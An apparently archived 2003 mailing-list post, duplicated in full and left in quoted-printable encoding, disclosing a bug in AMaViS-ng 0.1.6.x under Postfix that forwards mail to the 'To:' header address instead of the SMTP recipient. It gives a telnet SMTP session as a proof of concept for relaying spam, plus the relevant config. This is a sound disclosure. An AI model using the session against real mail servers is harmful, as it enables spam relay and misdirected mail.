Phil Cyc
08/04/03, 18:50
Hi everyone -
with postfix using AMaViS-ng 0.1.6.x (tested: 0.1.6.2 and 0.1.6.3; 0.1.4.=
x is=20
not vulnerable), all email gets forwarded to the address specified by the=
=20
"To:" header line, ignoring the real recipient given via "RCPT TO:".
Possible exploit:
--%snip%--
#> telnet somemx.domain.tld 25
(220 somemx.domain.tld ESMTP Postfix)
helo amavis-ng
(250 somemx.domain.tld)
mail from:userX@domainX.tld
(250 ok)
rcpt to:userY@domain.tld
(250 ok)
data
(354 End data with <CR><LF>.<CR><LF>)
From: userX@domainX.tld
To: userZ@domainZ.tld
Subject: AMaViS-ng 0.1.6.x bug
=2E
(250 Ok: queued as ...)
quit
(221 Bye)
--%snip%--
Requirements: The mx (somemx.domain.tld) having postfix and AMaViS-ng 0.1=
=2E6.x=20
installed must accept emails for userY@domain.tld.
What does it to:
userX@domainX.tld is sending an email to userY@domain.tld. The header of =
this=20
email contains "To: userZ@domain.tld". AMaViS-ng seems to parse the heade=
r=20
and forwards the email to userZ@domain.tld. userY@domain.tld does not get=
=20
this email.
As many postfix users trust their localhost (no restrictions for localhos=
t),=20
it is possible to relay an email or a spam mail this way.
configuration files (relevant parts):
# $postfix/master.cf
smtp inet n - n - - smtpd -o content_filter=3Dfilter:
filter unix - n n - - pipe
flags=3DRq user=3Dmail argv=3D/usr/bin/amavis ${sender} -- ${recipient}
# end of master.cf
# $amavis-ng/amavis.conf
[global]
mail-transfer-agent =3D Postfix
[Postfix]
postfix =3D /usr/sbin/sendmail
args =3D -i -f
# end of amavis.conf
There is no problem with AMaViS =3D=3D 0.1.4.x
Kind regards,
Phil Cyc
with postfix using AMaViS-ng 0.1.6.x (tested: 0.1.6.2 and 0.1.6.3; 0.1.4.=
x is=20
not vulnerable), all email gets forwarded to the address specified by the=
=20
"To:" header line, ignoring the real recipient given via "RCPT TO:".
Possible exploit:
--%snip%--
#> telnet somemx.domain.tld 25
(220 somemx.domain.tld ESMTP Postfix)
helo amavis-ng
(250 somemx.domain.tld)
mail from:userX@domainX.tld
(250 ok)
rcpt to:userY@domain.tld
(250 ok)
data
(354 End data with <CR><LF>.<CR><LF>)
From: userX@domainX.tld
To: userZ@domainZ.tld
Subject: AMaViS-ng 0.1.6.x bug
=2E
(250 Ok: queued as ...)
quit
(221 Bye)
--%snip%--
Requirements: The mx (somemx.domain.tld) having postfix and AMaViS-ng 0.1=
=2E6.x=20
installed must accept emails for userY@domain.tld.
What does it to:
userX@domainX.tld is sending an email to userY@domain.tld. The header of =
this=20
email contains "To: userZ@domain.tld". AMaViS-ng seems to parse the heade=
r=20
and forwards the email to userZ@domain.tld. userY@domain.tld does not get=
=20
this email.
As many postfix users trust their localhost (no restrictions for localhos=
t),=20
it is possible to relay an email or a spam mail this way.
configuration files (relevant parts):
# $postfix/master.cf
smtp inet n - n - - smtpd -o content_filter=3Dfilter:
filter unix - n n - - pipe
flags=3DRq user=3Dmail argv=3D/usr/bin/amavis ${sender} -- ${recipient}
# end of master.cf
# $amavis-ng/amavis.conf
[global]
mail-transfer-agent =3D Postfix
[Postfix]
postfix =3D /usr/sbin/sendmail
args =3D -i -f
# end of amavis.conf
There is no problem with AMaViS =3D=3D 0.1.4.x
Kind regards,
Phil Cyc